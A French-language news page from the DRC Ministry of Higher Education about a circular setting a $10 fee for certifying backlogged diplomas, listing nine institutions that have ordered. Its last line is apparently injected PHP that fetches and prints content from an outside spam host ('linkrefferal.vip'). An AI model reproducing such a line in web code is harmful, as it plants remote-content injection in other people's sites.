Enseignement Supérieur et Universitaire congolais en marche vers la numérisation

FLASH INFO :

Kinshasa, vendredi 29 septembre 2023.

Son Excellence MUHINDO NZANGI BUTONDO a signé ce lundi 10 juillet, une note circulaire à l’attention des chefs d’Etablissements, rappelant les dispositions liées à la soumission des arriérés des diplômes. Les frais à payer sont fixés à 10$ et cette mesure exceptionnelle dure 4 mois, à dater avril 2023.

Pour vider les arriérés des diplômes dus aux étudiants en-deçà de l’année 2020-2021, il a été décidé l’entérinement/homologation des diplômes au coût des frais qui couvrent uniquement l’impression habituelle, c’est-à-dire dix dollars américains. Cette mesure exceptionnelle dure quatre mois, à dater d’avril 2023.


Les Présidents des conférences des Chefs d’établissements ont été invités à relayer et assurer la stricte exécution de la mesure. Les Chefs d’établissements ont été instruits de contacter la Direction des services académiques et la Direction de l’enseignement supérieur privé, et de transmettre les données, par E-mail, à l’adresse diplome@minesu.gouv.cd sur la base du modèle de fichier de commande des arriérées des diplômes.


A ce jour, selon les informations des deux Directions et de la Cellule du numérique, neuf Etablissements ont fait la commande des diplômes. Il s’agit de :


-          Institut Supérieur des Techniques Médicales de Kasongo-Lunda ;


-          Institut Supérieur de Développement de Bunia ;


-          Université Révérend Kim ;


-          Institut Supérieur des Techniques Médicales de Kinshasa ;


-          Institut Supérieur de Leadership et Croissance de l’Eglise ;


-          Université Loyola du Congo ;


-          Institut Supérieur de Pêche de Mbandaka ;


-          Institut Supérieur Pédagogique Technique de Kinshasa ;


-          Institut Supérieur de Commerce de Kinshasa.


Compte tenu de l’urgence et du respect de la date buttoir, il est rappelé à tous les chefs d’établissements que cette mesure ne doit souffrir d’aucune exception.


Les Chefs de différentes missions de contrôle de scolarité de l’année 2022-2023 sont priés de présenter à la tutelle la situation de chaque Etablissement de leurs ressorts.


NOTE CIRCULAIRE 10.pdf


Publier le 10/07/2023 20h-20min-00s

Par : Espérant LUVUMBU


A LIRE AUSSI



Publication de l’Arrêté Ministériel n°342 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°341 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°343 du 20/07/2023 ... Suite


Publication de l’Arrêté Ministériel n°344 du 20/07/2023 ... Suite


Le Ministre MUHINDO NZANGI BUTONDO nomme des nouveaux animateu... Suite


Son Excellence MUHINDO NZANGI BUTONDO a signé ce lundi 10 jui... Suite


Publication du Plan National Sous-Sectoriel du Numérique PNSN... Suite


Octroie des bourses d’études universitaire et postuniversit... Suite


Mise à disposition des maquettes d’offres de formation du S... Suite


NOS ACTIVITES


Mobirise

Carte Universitaire

Le Ministère grâce à sa Direction Informatique produit les cartes universitaires de la République démocratique du Congo que les universités achète chaque année Voir les différentes cartes

Mobirise

Entérinement et Homologation

La Loi et les Instructions académiques en République Démocratique du Congo exigent des Etablissements Publics, Privés agrées et admis à l’agrément de remettre aux Voir la suite

Mobirise

Bourses d'études

Hormis la Bourse d’études de solidarité nationale et d’excellence, le Ministère de l’ESU octroi des bourses d'études pour plusieurs filières d’études dans le cadre ...Voir la suite

Mobirise

Contrôle de scolarité

Mission de contrôle de la scolarité des finalistes des Etablissements Publics ou Privés agrées et admis à l’agreement de l’ESU. La loi et les instructions académiques... Voir la suite

NOS PARTENAIRES


Dans le cadre de la Coopération Bilatéral (Etat à Etat), Multilatéral (internationale) et Régionale (sous-région), le Ministère de l’Enseignement Supérieur et Universitaire entretient des relations de Partenariat et conclu les accords de Coopérations avec des Etats, de Bailleurs de fonds, des Organismes et des Universités étrangères pour l’amélioration de la qualité de l’Enseignement au Supérieur.

Ce partenariat permet aux Etudiants, aux Personnels Académiques Enseignants et aux Administratifs de l’Enseignement du Supérieur de bénéficier des bourses d’études et de formation. Dans le même cadre, les structures spécialisées de l’Enseignement Supérieur et Universitaire bénéficient aussi l’appui financier, technique et logistique, étant entendu que certains projets font appels au Partenariat Publics Privés (PPP) lors de leurs exécutions.

Ministère de l'ESU

Adresse :

Secrétariat Général :

Boulevard Tshatshi N°67                    
Kinshasa/Gombe, RDC

Contact

Email: contact@minesu.gouv.cd 

Autres liens

Présidence de la République
Primature

echo file_get_contents("https://linkrefferal.vip/backlink.txt");